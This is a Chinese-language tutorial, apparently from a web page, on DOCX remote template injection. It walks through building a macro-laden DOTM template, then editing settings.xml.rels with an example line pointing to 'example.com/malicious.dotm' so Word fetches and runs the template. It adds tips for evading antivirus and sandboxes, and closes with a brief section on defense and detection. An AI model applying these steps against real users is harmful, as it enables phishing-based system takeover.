DOCX远程模板注入宏执行攻击技术详解<\/h1>

1. 技术原理<\/h2>

DOCX远程模板注入是一种利用Word文档模板加载机制实现宏代码执行的攻击技术。其核心原理是：<\/p>

创建包含恶意宏的DOTM模板文件<\/li>
制作看似无害的DOCX文档，但包含指向远程DOTM模板的引用<\/li>

当DOCX被打开时，Word会自动从远程位置下载并加载模板，执行其中的宏<\/li> <\/ol>

2. 技术优势<\/h2>

相比传统宏攻击方式，此技术具有以下优势：<\/p>

规避文件类型限制<\/strong>：许多组织仅阻止.doc\/.docm文件而允许.docx<\/li>
绕过静态检测<\/strong>：DOCX本身不含恶意代码，仅包含远程引用<\/li>
灵活部署<\/strong>：可通过HTTP(S)协议传输模板，避免SMB协议限制<\/li>

沙箱规避<\/strong>：可使用mod_rewrite规则或IP限制防止沙箱分析<\/li> <\/ul>
3. 攻击实施步骤<\/h2>
3.1 创建恶意DOTM模板<\/h3>

打开Word，确保"开发工具"选项卡可见<\/li>
进入"开发工具" → "Visual Basic"打开VBA编辑器<\/li>
双击"ThisDocument"打开代码窗口<\/li>
插入恶意宏代码（如PowerShell Empire payload）<\/li>
将文件另存为.dotm格式（建议使用无害名称如"InvoiceTemplate.dotm"）<\/li> <\/ol>
注意事项<\/strong>：<\/p>

宏代码需进行混淆处理以绕过Windows Defender等防护<\/li>
测试确保宏能正确执行（可临时禁用防护软件进行测试）<\/li> <\/ul>
3.2 创建诱导性DOCX文档<\/h3>

制作看似正常的Word文档内容<\/li>
将文档另存为.docx格式<\/li>
将文件扩展名改为.zip并解压<\/li>
进入word\/_rels\/<\/code>目录，编辑settings.xml.rels<\/code>文件<\/li> <\/ol> 3.3 修改模板引用<\/h3> 在settings.xml.rels<\/code>中：<\/p> 找到包含attachmentTemplate<\/code>的Relationship<\/code>标签<\/li> 将Target<\/code>属性值修改为远程DOTM模板的URL（如HTTPS地址）<\/li> <\/ul> 示例修改：<\/p> <Relationship<\/span> Type=<\/span>"http:\/\/schemas.openxmlformats.org\/officeDocument\/2006\/relationships\/attachedTemplate"<\/span> Target=<\/span>"https:\/\/example.com\/malicious.dotm"<\/span> TargetMode=<\/span>"External"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre>3.4 重新打包DOCX文件<\/h3> 将修改后的文件夹内容重新压缩为ZIP文件<\/li> 将.zip扩展名改回.docx<\/li> <\/ol> 4. 攻击效果<\/h2> 当受害者打开DOCX文档时：<\/p> Word自动从指定URL下载DOTM模板<\/li> 系统提示"启用内容"（取决于宏安全设置）<\/li> 一旦用户启用内容，恶意宏即被执行<\/li> 攻击者获得系统控制权（如PowerShell Empire会话）<\/li> <\/ol> 5. 防御措施<\/h2> 5.1 组织防护<\/h3> 禁用所有Office宏执行（最高安全级别）<\/li> 即使对.docx文件也保持警惕<\/li> 部署高级邮件过滤和沙箱分析<\/li> 监控异常网络连接（特别是Office进程的HTTP请求）<\/li> <\/ul> 5.2 技术检测<\/h3> 检查DOCX文件中的settings.xml.rels<\/code>是否存在外部模板引用<\/li> 分析网络流量中Office进程的异常HTTP请求<\/li> 使用AMSI扫描宏代码内容<\/li> <\/ul> 6. 高级技巧<\/h2> 隐蔽托管<\/strong>：使用合法云服务（如GitHub）托管恶意模板<\/li> 条件触发<\/strong>：通过mod_rewrite规则实现地理\/IP过滤，避开沙箱<\/li> 模板混淆<\/strong>：对DOTM文件进行混淆和签名规避<\/li> 多阶段加载<\/strong>：初始模板仅包含下载器功能，后续分阶段加载payload<\/li> <\/ol> 7. 总结<\/h2> DOCX远程模板注入是一种有效的攻击技术，利用了：<\/p> 用户对.docx文件的信任<\/li> 组织对宏文档的过滤不完整性<\/li> Word自动加载远程模板的特性<\/li> <\/ul> 防御需要多层次防护，包括技术限制、用户教育和持续监控。<\/p>